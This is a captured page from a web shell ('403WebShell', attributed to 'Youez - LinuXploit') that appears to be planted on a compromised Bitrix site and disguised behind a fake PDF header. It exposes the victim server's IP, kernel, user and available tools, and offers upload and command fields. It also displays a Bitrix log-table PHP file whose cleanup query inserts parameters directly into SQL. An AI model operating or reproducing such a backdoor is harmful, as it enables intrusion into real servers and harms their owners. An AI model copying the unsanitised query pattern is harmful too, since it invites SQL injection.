%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 13.58.21.119
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/sale/lib/exchange/internals/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/sale/lib/exchange/internals/exchangelog.php
<?php

namespace Bitrix\Sale\Exchange\Internals;

use Bitrix\Main;
use Bitrix\Sale\Exchange\EntityType;

/**
 * Class ExchangeLogTable
 *
 * DO NOT WRITE ANYTHING BELOW THIS
 *
 * <<< ORMENTITYANNOTATION
 * @method static EO_ExchangeLog_Query query()
 * @method static EO_ExchangeLog_Result getByPrimary($primary, array $parameters = array())
 * @method static EO_ExchangeLog_Result getById($id)
 * @method static EO_ExchangeLog_Result getList(array $parameters = array())
 * @method static EO_ExchangeLog_Entity getEntity()
 * @method static \Bitrix\Sale\Exchange\Internals\EO_ExchangeLog createObject($setDefaultValues = true)
 * @method static \Bitrix\Sale\Exchange\Internals\EO_ExchangeLog_Collection createCollection()
 * @method static \Bitrix\Sale\Exchange\Internals\EO_ExchangeLog wakeUpObject($row)
 * @method static \Bitrix\Sale\Exchange\Internals\EO_ExchangeLog_Collection wakeUpCollection($rows)
 */
class ExchangeLogTable extends Main\Entity\DataManager
{
	public static function getTableName()
	{
		return 'b_sale_exchange_log';
	}

	public static function getMap()
	{
		return array(
			'ID' => array(
				'data_type' => 'integer',
				'primary' => true,
				'autocomplete' => true
			),
			'ENTITY_ID' => array(
				'required' => true,
				'data_type' => 'integer'
			),
			'ENTITY_TYPE_ID' => array(
				'required' => true,
				'data_type' => 'integer'
			),
			'PARENT_ID' => array(
				'data_type' => 'integer'
			),
			'OWNER_ENTITY_ID' => array(
				'data_type' => 'integer'
			),
			'ENTITY_DATE_UPDATE' => array(
				'data_type' => 'datetime',
			),
			'XML_ID' => array(
				'data_type' => 'string'
			),
			'MARKED' => array(
				'data_type' => 'boolean',
				'values' => array('N', 'Y')
			),
			'DESCRIPTION' => array(
				'data_type' => 'text'
			),
			'MESSAGE' => array(
				'data_type' => 'text'
			),
			'DATE_INSERT' => array(
				'data_type' => 'datetime',
				'require' => true,
				'default_value' => function(){return new \Bitrix\Main\Type\DateTime();}
			),
			'DIRECTION' => array(
				'data_type' => 'string',
				'require' => true,
				'values' => array('E', 'I')
			),
			'PROVIDER' => array(
				'data_type' => 'string'
			),
		);
	}

	/**
	 * Clears all logging data
	 */
	public static function deleteAll()
	{
		$tableName = static::getTableName();
		$connection = Main\Application::getConnection();
		$connection->queryExecute("DELETE FROM {$tableName}");
	}

	/**
	 * Clears old logging data
	 */
	public static function deleteOldRecords($direction, $provider, $interval)
	{
		$tableName = static::getTableName();

		if ($direction == '')
			throw new Main\ArgumentOutOfRangeException("$direction");
		if ($provider == '')
			throw new Main\ArgumentOutOfRangeException("$provider");

		$r = ExchangeLogTable::getList(array(
			'select' => array(
				new Main\Entity\ExpressionField('MAX_DATE_INSERT', 'MAX(%s)', array('DATE_INSERT'))
			),
			'filter' => array(
				'=DIRECTION'=>$direction,
				'=PROVIDER'=>$provider
			)
		));

		if ($loggingRecord = $r->fetch())
		{
			if($loggingRecord['MAX_DATE_INSERT'] <> '')
			{
				$maxDateInsert = $loggingRecord['MAX_DATE_INSERT'];
				$date = new Main\Type\DateTime($maxDateInsert);
				$connection = Main\Application::getConnection();
				$connection->queryExecute("delete from {$tableName} where DATE_INSERT < DATE_SUB('{$date->format("Y-m-d")}', INTERVAL {$interval} DAY) and DIRECTION='{$direction}' and PROVIDER='{$provider}'");
			}
		}
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit